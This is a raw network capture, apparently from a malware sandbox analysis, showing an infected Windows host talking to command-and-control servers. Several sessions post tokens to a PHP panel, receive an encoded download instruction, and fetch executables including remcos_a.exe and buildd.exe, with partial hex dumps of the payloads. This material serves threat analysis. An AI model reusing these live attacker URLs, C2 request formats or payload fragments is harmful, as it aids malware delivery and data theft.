2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 2d 2d 0d 0a Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="message"ybncbhylepme------DBKKKEHDHCBFIEBFBGID--
Nov 7, 2024 04:12:25.937624931 CET	271	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=
Nov 7, 2024 04:12:28.638478041 CET	474	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 2d 2d 0d 0a Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KEGDAKEHJDHIDHJJDAEC--
Nov 7, 2024 04:12:29.413606882 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49762	185.215.113.16	80	6816	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:12:25.947072029 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 7, 2024 04:12:26.835122108 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:12:26 GMT Content-Type: application/octet-stream Content-Length: 3228160 Last-Modified: Thu, 07 Nov 2024 02:49:14 GMT Connection: keep-alive ETag: "672c2aaa-314200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfP1@1I1@Wk71T71 @.rsrc@.idata @lyrqextr**@gmycikna@11@.taggant0P1" 1@
Nov 7, 2024 04:12:26.835135937 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:12:26.835144997 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:12:26.835155964 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:12:26.835165977 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:12:26.835176945 CET	1236	IN	Data Raw: af a0 fa f7 f6 27 fb 1f 3c 27 36 d3 a9 8e c6 77 21 60 bf 1f dc 50 d3 59 65 0c 15 72 64 e4 92 0f ae a0 fa f7 16 27 fb 1f 3c 27 36 d3 a9 8e f6 77 e1 60 bf 1f dc 78 d3 59 65 0c 35 72 64 e4 92 6f ae a0 fa f7 36 27 fb 1f 3c 27 36 d3 a9 8e f6 77 f1 60 Data Ascii: '<'6w!`PYerd'<'6w`xYe5rdo6'<'6w`YeUrdV'<'6w`Yeurd/v'<'6waaYerd&<'6wya0Yerd&<'6wMaYerdO&<'6wQa
Nov 7, 2024 04:12:26.835253000 CET	848	IN	Data Raw: dc c0 d6 59 65 0c d5 76 64 e4 92 4f bc a0 fa f7 d6 5a fb 1f 3c 27 36 d3 a9 8e fe 77 15 62 bf 1f dc 38 cb 59 65 0c f5 76 64 e4 92 af bc a0 fa f7 f6 5a fb 1f 3c 27 36 d3 a9 8e f6 77 1d 62 bf 1f dc 10 cb 59 65 0c 15 77 64 e4 92 0f bf a0 fa f7 16 5a Data Ascii: YevdOZ<'6wb8YevdZ<'6wbYewdZ<'6wbHYe5wdo6Z<'6wbYeUwdVZ<'6wbYeuwd/vZ<'6wbXYewdY<'6wbpYewdY
Nov 7, 2024 04:12:26.835263968 CET	1236	IN	Data Raw: 16 5f fb 1f 3c 27 36 d3 a9 8e fe 77 75 6c bf 1f dc f0 c9 59 65 0c 35 7a 64 e4 92 6f 86 a0 fa f7 36 5f fb 1f 3c 27 36 d3 a9 8e ba 77 7d 6c bf 1f dc 58 d7 59 65 0c 55 7a 64 e4 92 cf 86 a0 fa f7 56 5f fb 1f 3c 27 36 d3 a9 8e f2 77 39 6c bf 1f dc a0 Data Ascii: _<'6wulYe5zdo6_<'6w}lXYeUzdV_<'6w9lYeuzd/v_<'6wlxYezd^<'6wlYezd^<'6wlHYezdO^<'6wmmYezd^<'6wqm`
Nov 7, 2024 04:12:26.835273981 CET	1236	IN	Data Raw: 65 0c f5 7e 64 e4 92 af 94 a0 fa f7 f6 52 fb 1f 3c 27 36 d3 a9 8e e2 77 dd 68 bf 1f dc 08 c9 59 65 0c 15 7f 64 e4 92 0f 97 a0 fa f7 16 52 fb 1f 3c 27 36 d3 a9 8e f2 77 b1 68 bf 1f dc a0 d7 59 65 0c 35 7f 64 e4 92 6f 97 a0 fa f7 36 52 fb 1f 3c 27 Data Ascii: e~dR<'6whYedR<'6whYe5do6R<'6whhYeUdVR<'6!;F(6j!F(6!F(6whYedOQ<'6w%i0YedQ<'6!F(6
Nov 7, 2024 04:12:26.835289001 CET	424	IN	Data Raw: a9 b1 71 f3 e6 08 f6 92 28 10 12 2d 9a 1b 05 77 61 e4 bc 1f e8 a1 0e 4f 8d 8c ec 1c 65 28 36 d3 a9 b1 71 f3 33 6f 0b 10 32 24 77 59 61 b4 3d 19 f1 e1 bf 1f 03 eb 2c 1f ee a1 f2 9c a5 e0 aa f7 89 f7 f9 1f e6 20 f2 d8 63 90 fc 5a 65 6f 3c 41 38 26 Data Ascii: q(-waOe(6q3o2$wYa=, cZeo<A8&(6(6(6q3o2$wYa=, cXZeo<A8&(6(6(6q#jpoujloA(6(6:a6(6(6qqV!sZo
Nov 7, 2024 04:12:26.842113018 CET	1236	IN	Data Raw: 30 e8 73 0f ec ac fe 42 a7 ec fa d3 a9 28 36 d3 a9 28 36 d3 a9 28 36 d3 a9 b1 71 f3 ee e5 77 4a 9d 67 16 17 33 1b 8f 17 37 1b aa 13 ee 91 f6 94 2d e0 71 49 61 6f b3 1b 5e ae fe 6a 6a 6f fa 24 63 91 f3 af 64 ba 71 fa 38 26 f2 1f 57 24 a4 94 80 b9 Data Ascii: 0sB(6(6(6qwJg37-qIao^jjo$cdq8&W$8e(6qI3]acJ;8e:A8&(6(6qyaqtam;aou!e5y=E?#I2wZYem(,7&qlime(<q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49799	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:04.332416058 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 04:13:05.299437046 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49815	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:06.820962906 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 04:13:07.750171900 CET	734	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 31 66 0d 0a 20 3c 63 3e 31 30 30 34 34 39 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 39 37 61 39 66 34 32 34 33 61 64 36 63 65 35 30 32 34 31 35 34 35 30 23 31 30 30 34 35 30 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 39 62 34 64 34 38 62 61 31 64 65 31 35 34 34 31 23 31 30 30 34 35 31 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 34 35 31 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 [TRUNCATED] Data Ascii: 21f <c>1004494001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd97a9f4243ad6ce502415450#1004506001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a9b4d48ba1de15441#1004516001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1004517001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1004518031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1004519001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49821	31.41.244.11	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:07.758889914 CET	56	OUT	GET /files/remcos_a.exe HTTP/1.1 Host: 31.41.244.11
Nov 7, 2024 04:13:08.629626036 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:08 GMT Content-Type: application/octet-stream Content-Length: 1948672 Last-Modified: Thu, 07 Nov 2024 01:19:50 GMT Connection: keep-alive ETag: "672c15b6-1dbc00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fc 29 b7 a4 b8 48 d9 f7 b8 48 d9 f7 b8 48 d9 f7 0c d4 28 f7 ab 48 d9 f7 0c d4 2a f7 13 48 d9 f7 0c d4 2b f7 a6 48 d9 f7 b1 30 5d f7 b9 48 d9 f7 26 e8 1e f7 ba 48 d9 f7 ea 20 dc f6 86 48 d9 f7 ea 20 dd f6 99 48 d9 f7 ea 20 da f6 a2 48 d9 f7 b1 30 4a f7 a1 48 d9 f7 b8 48 d8 f7 f9 49 d9 f7 13 21 d0 f6 db 48 d9 f7 13 21 26 f7 b9 48 d9 f7 13 21 db f6 b9 48 d9 f7 52 69 63 68 b8 48 d9 f7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 6b 91 24 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 60 05 00 00 24 02 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 70 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$)HHH(HH+H0]H&H H H H0JHHI!H!&H!HRichHPELk$g`$Kp@K_dx`MdKpdK P@.rsrcM`@.idata @ 0@zncloxxx1@sftjulluK@.taggant0K"@
Nov 7, 2024 04:13:08.629790068 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:08.629821062 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:08.629827023 CET	636	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:08.629846096 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 75 0a 55 69 5c 92 48 10 63 71 29 b5 c5 35 0a 1e f2 52 7e 22 ba af d8 7a 01 45 07 11 ea a5 89 a5 e5 30 ed 4b cd 7a c2 aa be 0f 28 62 27 ea fe 13 00 fb 03 5f d2 01 96 64 bd 7d 3e d3 Data Ascii: uUi\Hcq)5R~"zE0Kz(b'_d}>.N@cZosV"C/~2Dy{i^.yrnS:)Izq*PI\aQGoryksNuP;rTfz;qQb}`[r:0y\6B!1`q n{e2nu#!Q^rw62lWS
Nov 7, 2024 04:13:08.629863024 CET	1236	IN	Data Raw: 61 cc 64 49 38 95 31 4a f5 2a 60 f5 f1 a2 e9 0f aa b3 74 0e 6a be e5 76 15 6a ac 37 79 60 85 52 42 16 c5 3a 7a f4 b9 31 8b c0 70 52 30 54 e4 2a 69 6b 1c 09 ee 3a c0 1a c8 31 70 51 c3 aa 6d 4f 85 aa 01 2f 7a 8e 90 c5 86 6c 79 9e c7 21 3f c5 e0 f2 Data Ascii: adI81J`tjvj7y`RB:z1pR0Tik:1pQmO/zly!?`OifL{/llQ{_2#Y[rJ 3kPi%z!Uf;n[ t?w!Vm+O!If'fbtLQ)c=/]A?rL@0p^t,t?yqIE-^nf=)
Nov 7, 2024 04:13:08.629884005 CET	1236	IN	Data Raw: b1 10 a1 73 87 18 c7 42 66 6b 9e c9 38 f9 5a 1e 29 18 55 74 4f 49 67 f9 da 2e 06 5f ec 14 6d f3 67 a8 4a 8f 51 b3 57 e5 d0 92 aa 2f 89 4d 64 6a 38 ed e0 e9 6d 12 77 29 c1 20 ae 28 92 d2 f4 28 c9 be cf c8 1d 9b 78 a9 88 ca 7b 3d 2f c4 bf 2c 6c a8 Data Ascii: sBfk8Z)UtOIg._mgJQW/Mdj8mw) ((x{=/,l>@[zG0zsNfTbh~>fN<q`R>1in_H/<,M^4K[2na0_4P"^ jW[xwKdH[k3:)4h]Hf`WW^t\UV
Nov 7, 2024 04:13:08.629895926 CET	1236	IN	Data Raw: ea dd f2 25 96 2c ca ae b8 be ae 5d 91 63 aa ae 25 cb 36 26 40 c2 dc bf 4d e2 b0 c1 77 13 d6 63 bc 27 50 f6 ef 6d 6d 59 97 27 e4 d8 69 f5 c0 af 4c 8f a3 71 6a 35 71 7b 33 f5 dc 59 e0 9d 5a 4c 60 42 ae 04 27 27 43 de 6d d6 69 4f 3e f6 89 84 23 62 Data Ascii: %,]c%6&@Mwc'PmmY'iLqj5q{3YZL`B''CmiO>#bql1(n_F-HH^s%YMG[G'W7}}3buW}r>>fc}/yn'SdWDuN2Oe]Nu\|Q>N=,Aoyg.
Nov 7, 2024 04:13:08.629908085 CET	1236	IN	Data Raw: 6d 6b 1b 0e ae 2e cf 7e 93 44 99 71 3d 8a 71 76 2e 68 6a 00 71 2d 38 54 ea 6e b6 3b c0 9a 7b 13 36 23 18 84 12 90 e0 00 8b 6f c7 70 b6 42 94 01 05 4f 51 a1 d7 d2 b0 72 5f b0 5e ef 93 2b ce 5f 88 0f c5 d5 fd f8 c8 69 6a 9c 2a 38 69 09 62 fd 49 4d Data Ascii: mk.~Dq=qv.hjq-8Tn;{6#opBOQr_^+_ij8ibIMrhPQQ+xk![/Ro-=qDIeLaG4Ij@L}+Qqbp;0?%bifqCMf_ZC`B4`t2WsEU2miZ@64NyVW
Nov 7, 2024 04:13:08.629921913 CET	1236	IN	Data Raw: c5 63 b2 04 45 37 1e 44 8c 3c 1f 08 36 fb 1d 7d 3c db 4d 50 9d 24 39 1f 49 95 71 fa 9d 44 4f a2 6d fb 12 cb 9f 98 41 44 0a 5e 56 6a 78 7a ff 91 f3 c1 f0 8f 08 92 d2 17 82 99 95 7b fd de 42 e9 3e c3 6f c4 79 7e b1 eb 7c 73 e9 7b fc 4f b2 50 8b 21 Data Ascii: cE7D<6}<MP$9IqDOmAD^Vjxz{B>oy~\|s{OP!kJveQLj>C6a.]/2EKg=.usic-ZkJa^A '@#2_w")']O>u8v.K0Go8<m0;D(K'[~#I/_JpFyCl
Nov 7, 2024 04:13:08.634691000 CET	1236	IN	Data Raw: 87 85 43 bf 45 9e 80 d1 64 ee ac 92 6b e0 3a a0 5a b7 db 3f fe 88 ad 08 3a 78 20 77 06 8c 60 72 6a 2d 3c bb 2e f4 a6 e5 70 b3 de 82 02 69 d6 03 c0 57 a9 92 29 48 b1 45 35 36 ea 58 b9 5f da 2a 30 ba 6a 27 bd 73 58 1e 86 ea eb 46 84 33 d3 fe fe 28 Data Ascii: CEdk:Z?:x w`rj-<.piW)HE56X_*0j'sXF3(!oQk]d+Zy~.i?v=r"`Pm[pERzg\|~@$f\Z^`VIIjkD+xw&l",<):q<PuK0s$4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49845	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:11.961098909 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 34 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004494001&unit=246122658369
Nov 7, 2024 04:13:12.882733107 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49851	31.41.244.11	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:12.889153957 CET	54	OUT	GET /files/buildd.exe HTTP/1.1 Host: 31.41.244.11
Nov 7, 2024 04:13:13.775651932 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:13 GMT Content-Type: application/octet-stream Content-Length: 158208 Last-Modified: Thu, 07 Nov 2024 01:44:48 GMT Connection: keep-alive ETag: "672c1b90-26a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 c1 80 e4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 5e 02 00 00 0a 00 00 00 00 00 00 5e 7c 02 00 00 20 00 00 00 80 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 02 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 0c 7c 02 00 4f 00 00 00 00 80 02 00 48 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELX"0^^\| @ `\|OH H.textd\ ^ `.rsrcH`@@.reloch@B@\|H<_PK5Pnw{\|8K["#&'=F82psa #'+ciiiiPKPKPKPK"(,n~'~'Jr1p
Nov 7, 2024 04:13:13.775680065 CET	1236	IN	Data Raw: 28 5e 00 00 0a 80 07 00 00 04 2a 72 02 28 2c 00 00 0a 00 00 02 16 7d 4a 00 00 04 02 17 8d 09 00 00 02 7d 4b 00 00 04 2a 72 02 28 2c 00 00 0a 00 00 02 03 7d 4a 00 00 04 02 17 8d 09 00 00 02 7d 4b 00 00 04 2a 46 00 02 17 6f 4a 00 00 06 00 02 28 af Data Ascii: (^r(,}J}Kr(,}J}KFoJ(.sVE(P~(oH~H(WI~bb.sac(}"(Vse(t fJ(W((~(~%:&
Nov 7, 2024 04:13:13.775696039 CET	1236	IN	Data Raw: 01 00 00 06 28 93 01 00 06 00 2a 4a 00 72 7e b9 00 70 28 01 00 00 06 28 93 01 00 06 00 2a ea 72 96 b9 00 70 28 01 00 00 06 80 fd 01 00 04 73 02 01 00 0a 25 6f 6b 01 00 0a 72 e2 b9 00 70 28 01 00 00 06 72 fa b9 00 70 28 01 00 00 06 6f 6c 01 00 0a Data Ascii: (Jr~p((rp(s%okrp(rp(ol6(}6(}~%:&~s%s(.s*0Prp( X 8o
